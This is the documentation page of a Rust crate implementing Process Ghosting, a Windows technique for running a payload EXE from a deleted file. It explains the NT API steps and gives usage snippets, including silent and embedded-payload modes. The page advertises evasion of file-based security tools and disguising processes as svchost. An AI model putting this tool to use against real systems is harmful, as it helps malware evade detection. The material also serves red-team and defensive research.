ProcessGhosting 0.1.0

Process Ghosting technique implementation - Execute PE files from memory without leaving traces on disk
Documentation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548

# ProcessGhosting πŸ‘»


[![Crates.io](https://img.shields.io/crates/v/ProcessGhosting.svg)](https://crates.io/crates/ProcessGhosting)
[![Documentation](https://docs.rs/ProcessGhosting/badge.svg)](https://docs.rs/ProcessGhosting)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Build Status](https://github.com/BlackTechX011/ProcessGhosting/workflows/CI/badge.svg)](https://github.com/BlackTechX011/ProcessGhosting/actions)
[![Downloads](https://img.shields.io/crates/d/ProcessGhosting.svg)](https://crates.io/crates/ProcessGhosting)
[![Windows](https://img.shields.io/badge/platform-windows-blue.svg)](https://github.com/BlackTechX011/ProcessGhosting)

> **A Rust implementation of the Process Ghosting technique by BlackTechX**

Process Ghosting is an advanced code execution technique that allows running executable code without leaving traces on the filesystem. This library provides a safe, easy-to-use Rust API for implementing this technique.

---

## πŸ“‹ Table of Contents


- [What is Process Ghosting?]#-what-is-process-ghosting
- [How It Works]#-how-it-works
- [Technical Deep Dive]#-technical-deep-dive
- [Installation]#-installation
- [Quick Start]#-quick-start
- [API Reference]#-api-reference
- [Examples]#-examples
- [Hex Utilities]#-hex-utilities
- [Architecture Support]#-architecture-support
- [Building]#-building
- [Security Considerations]#-security-considerations
- [Credits]#-credits
- [License]#-license

---

## πŸ‘» What is Process Ghosting?


Process Ghosting is a technique discovered by Gabriel Landau at Elastic Security. It exploits the Windows file system and process creation mechanisms to execute code from a file that no longer exists on disk.

### Key Features


| Feature | Description |
|---------|-------------|
| πŸ”’ **Fileless Execution** | Payload file is deleted before process starts |
| πŸ•΅οΈ **Anti-Forensics** | No file remains on disk for security tools to scan |
| πŸ›‘οΈ **Evasion** | Bypasses many file-based security products |
| πŸ‘€ **Stealth** | Process appears to run from a legitimate path |
| πŸ¦€ **Pure Rust** | Safe, fast, and memory-efficient implementation |
| πŸ“¦ **Easy API** | Simple builder pattern for configuration |

---

## πŸ”¬ How It Works


Process Ghosting exploits the Windows NT kernel's handling of delete-pending files:

```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚                    PROCESS GHOSTING FLOW                        β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

                    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                    β”‚    START     β”‚
                    β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚  1. Create temp file  β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚ 2. Set delete-pending  β”‚
               β”‚ (NtSetInformationFile) β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚  3. Write PE payload  β”‚
               β”‚     to the file       β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚  4. Create SEC_IMAGE  β”‚
               β”‚   section from file   β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚  5. Close file handle β”‚
               β”‚  ⚠️ FILE DELETED! ⚠️ β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚  6. Create process    β”‚
               β”‚   from the section    β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚  7. Setup PEB and     β”‚
               β”‚  process parameters   β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
               β”‚  8. Create thread at  β”‚
               β”‚     entry point       β”‚
               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
                           β–Ό
                 
                       RUNNING    
                    (No file! πŸ‘»)
                   
```

### The Magic Explained


1. **Delete-Pending State**: When a file is marked for deletion but still has an open handle, it enters a "delete-pending" state
2. **Section Creation**: Windows allows creating an image section from a delete-pending file
3. **File Deletion**: Once we close the file handle, the file is deleted from disk
4. **Process Creation**: The section (now without a backing file) can still be used to create a process

---

## πŸ”§ Technical Deep Dive


### NT API Functions Used


| Function | Purpose |
|----------|---------|
| `NtOpenFile` | Open temp file with DELETE permission |
| `NtSetInformationFile` | Mark file as delete-pending |
| `NtCreateSection` | Create SEC_IMAGE section |
| `NtCreateProcessEx` | Create process from section |
| `NtQueryInformationProcess` | Get PEB address |
| `RtlCreateProcessParametersEx` | Create process parameters |
| `NtAllocateVirtualMemory` | Allocate memory in target |
| `NtWriteVirtualMemory` | Write parameters to target |
| `NtCreateThreadEx` | Start execution |
| `RtlImageNtHeader` | Parse PE headers |

### Memory Layout


```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚                TARGET PROCESS MEMORY              β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚                                                   β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚              MAPPED PE IMAGE                 β”‚ β”‚
β”‚  β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”‚
β”‚  β”‚  DOS Header (MZ)                             β”‚ β”‚
β”‚  β”‚  NT Headers                                  β”‚ β”‚
β”‚  β”‚    └─ OptionalHeader.AddressOfEntryPoint ────┼─┼──► Entry Point
β”‚  β”‚  Section Headers                             β”‚ β”‚
β”‚  β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”‚
β”‚  β”‚  .text   (Code)         ◄── Execution starts β”‚ β”‚
β”‚  β”‚  .rdata  (Read-only data)                    β”‚ β”‚
β”‚  β”‚  .data   (Initialized data)                  β”‚ β”‚
β”‚  β”‚  .rsrc   (Resources)                         β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                                                   β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚                    PEB                       β”‚ β”‚
β”‚  β”‚  β”œβ”€ ImageBaseAddress                         β”‚ β”‚
β”‚  β”‚  └─ ProcessParameters                        | |
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                                      β”‚            β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚       RTL_USER_PROCESS_PARAMETERS            β”‚ β”‚
β”‚  β”‚  ImagePathName: C:\Windows\System32\svchost  β”‚ β”‚
β”‚  β”‚  CommandLine: svchost.exe                    β”‚ β”‚
β”‚  β”‚  Environment: ...                            β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

### Comparison with Other Techniques


| Technique | File on Disk During Execution | Detectable by File Scan | Complexity |
|-----------|------------------------------|------------------------|------------|
| **Process Ghosting** | ❌ No | ❌ No | ⭐⭐⭐ |
| Process Hollowing | βœ… Yes (legitimate) | ⚠️ Maybe | ⭐⭐ |
| Process DoppelgÀnging | ❌ No | ❌ No | ⭐⭐⭐⭐ |
| DLL Injection | βœ… Yes | βœ… Yes | ⭐⭐ |
| Reflective Loading | ❌ No | ⚠️ Memory scan | ⭐⭐⭐ |

---

## πŸ“¦ Installation


Add to your `Cargo.toml`:

```toml
[dependencies]
ProcessGhosting = "0.1"
```

Or using cargo:

```bash
cargo add ProcessGhosting
```

---

## πŸš€ Quick Start


### Method 1: From File


```rust
use process_ghosting::{GhostingBuilder, init};

fn main() -> Result<(), String> {
    init();  // Print banner
    
    GhostingBuilder::from_file("payload.exe")?
        .x64()
        .with_logging()
        .execute()
}
```

### Method 2: From Bytes


```rust
use process_ghosting::GhostingBuilder;

fn main() -> Result<(), String> {
    let payload = std::fs::read("payload.exe").unwrap();
    
    GhostingBuilder::new(&payload)
        .x64()
        .execute()
}
```

### Method 3: From Hex String


```rust
use process_ghosting::GhostingBuilder;

fn main() -> Result<(), String> {
    let hex = "0x4D, 0x5A, 0x90, ...";  // Your payload
    
    GhostingBuilder::from_hex_string(hex)?
        .x64()
        .execute()
}
```

### Method 4: Embedded at Compile Time


```rust
use process_ghosting::GhostingBuilder;

const PAYLOAD: &[u8] = include_bytes!("../payload.exe");

fn main() -> Result<(), String> {
    GhostingBuilder::new(PAYLOAD)
        .x64()
        .silent()
        .execute()
}
```

### Method 5: Quick Functions


```rust
use process_ghosting::{ghost_payload_file, ghost_payload};

fn main() -> Result<(), String> {
    // From file
    ghost_payload_file("payload.exe")?;
    
    // From bytes
    let bytes = std::fs::read("payload.exe").unwrap();
    ghost_payload(&bytes)
}
```

---

## πŸ“š API Reference


### GhostingBuilder


Main builder for configuring process ghosting operations.

```rust
// Creation methods
GhostingBuilder::new(payload: &[u8]) -> Self
GhostingBuilder::from_file(path: &str) -> Result<Self, String>
GhostingBuilder::from_hex_string(hex: &str) -> Result<Self, String>
GhostingBuilder::from_hex_array(bytes: &[u8]) -> Self

// Configuration methods
.x64() -> Self                           // Target x64 (default)
.x86() -> Self                           // Target x86
.architecture(arch: Architecture) -> Self // Set architecture
.with_logging() -> Self                  // Enable verbose output
.silent() -> Self                        // Disable all output
.verbose(bool) -> Self                   // Set verbosity

// Execution
.build() -> GhostingConfig               // Get configuration
.execute() -> Result<(), String>         // Execute ghosting
```

### Quick Functions


```rust
// Execute with defaults (x64, verbose)
ghost_payload(payload: &[u8]) -> Result<(), String>

// Execute from file
ghost_payload_file(path: &str) -> Result<(), String>

// Execute from hex string
ghost_payload_hex(hex: &str) -> Result<(), String>

// Execute with architecture
ghost_payload_arch(payload: &[u8], arch: Architecture) -> Result<(), String>
```

### Architecture Enum


```rust
pub enum Architecture {
    X86,  // 32-bit
    X64,  // 64-bit (default)
}
```

---

## πŸ”’ Hex Utilities


### Convert EXE to Hex


```rust
use process_ghosting::{exe_to_hex_string, print_exe_hex};

// Get as string: "0x4D, 0x5A, 0x90, ..."
let hex = exe_to_hex_string("payload.exe")?;

// Print formatted for Rust code
print_exe_hex("payload.exe")?;
// Output:
// const PAYLOAD: &[u8] = &[
//     0x4D, 0x5A, 0x90, 0x00, ...
// ];
```

### Parse Hex Strings


All formats supported:

```rust
use process_ghosting::parse_hex_string;

// Continuous
parse_hex_string("4D5A9000")?;

// Space-separated  
parse_hex_string("4D 5A 90 00")?;

// C-style
parse_hex_string("0x4D, 0x5A, 0x90, 0x00")?;

// Escaped
parse_hex_string("\\x4D\\x5A\\x90\\x00")?;
```

### Utility Functions


```rust
// Read file as bytes
read_exe_bytes(path: &str) -> Result<Vec<u8>, String>

// Convert bytes to hex string
bytes_to_hex_string(bytes: &[u8]) -> String

// Convert file to formatted array
exe_to_hex_array(path: &str) -> Result<String, String>
```

---

## πŸ“ Examples


### Run Examples


```bash
# Basic usage

cargo run --example basic_usage

# From file with path argument

cargo run --example from_file -- payload.exe

# Convert EXE to hex

cargo run --example hex_converter -- print notepad.exe

# Full demo

cargo run --example full_demo
```

### Example: Basic Usage


```rust
use process_ghosting::{GhostingBuilder, init};

fn main() {
    init();
    
    match GhostingBuilder::from_file("payload.exe") {
        Ok(builder) => {
            match builder.x64().with_logging().execute() {
                Ok(_) => println!("[+] Success!"),
                Err(e) => println!("[-] Failed: {}", e),
            }
        }
        Err(e) => println!("[-] Load error: {}", e),
    }
}
```

### Example: Silent Execution


```rust
use process_ghosting::GhostingBuilder;

fn main() {
    let payload = std::fs::read("payload.exe").unwrap();
    
    let _ = GhostingBuilder::new(&payload)
        .x64()
        .silent()
        .execute();
}
```

### Example: Error Handling


```rust
use process_ghosting::GhostingBuilder;

fn main() {
    let result = GhostingBuilder::from_file("payload.exe")
        .and_then(|b| b.x64().execute());
    
    match result {
        Ok(_) => std::process::exit(0),
        Err(e) => {
            eprintln!("Error: {}", e);
            std::process::exit(1);
        }
    }
}
```

---

## πŸ—οΈ Architecture Support


| Architecture | Status | Method |
|--------------|--------|--------|
| x64 (AMD64) | βœ… Supported | `.x64()` (default) |
| x86 (i386) | βœ… Supported | `.x86()` |
| ARM64 | ❌ Not yet | - |

---

## πŸ”¨ Building


```bash
# Debug build

cargo build

# Release build

cargo build --release

# Build for 32-bit

cargo build --release --target i686-pc-windows-msvc

# Build for 64-bit

cargo build --release --target x86_64-pc-windows-msvc

# Run tests

cargo test

# Build docs

cargo doc --open
```

---

## ⚠️ Security Considerations


### Intended Use Cases


- βœ… Security research
- βœ… Red team operations  
- βœ… Penetration testing (authorized)
- βœ… Malware analysis
- βœ… Educational purposes

### Prohibited Uses


- ❌ Unauthorized system access
- ❌ Malware deployment
- ❌ Any illegal activities

### Legal Disclaimer


This software is provided for educational and authorized security research purposes only. The author is not responsible for any misuse. Users must ensure compliance with all applicable laws.

---

## πŸ™ Credits


- **Gabriel Landau** (Elastic Security) - Original Process Ghosting research.
- **Offensive Panda** (Github: @offensive-panda) - Process Ghosting in c.
- **BlackTechX** - Rust implementation

---

## πŸ“„ License


MIT License - See [LICENSE](LICENSE) file.

---

## πŸ”— Links


- [Crates.io]https://crates.io/crates/ProcessGhosting
- [Documentation]https://docs.rs/ProcessGhosting
- [GitHub Repository]https://github.com/BlackTechX011/ProcessGhosting
- [Original Research]https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack

---

<p align="center">
  <b>Made with πŸ‘» by BlackTechX</b>
</p>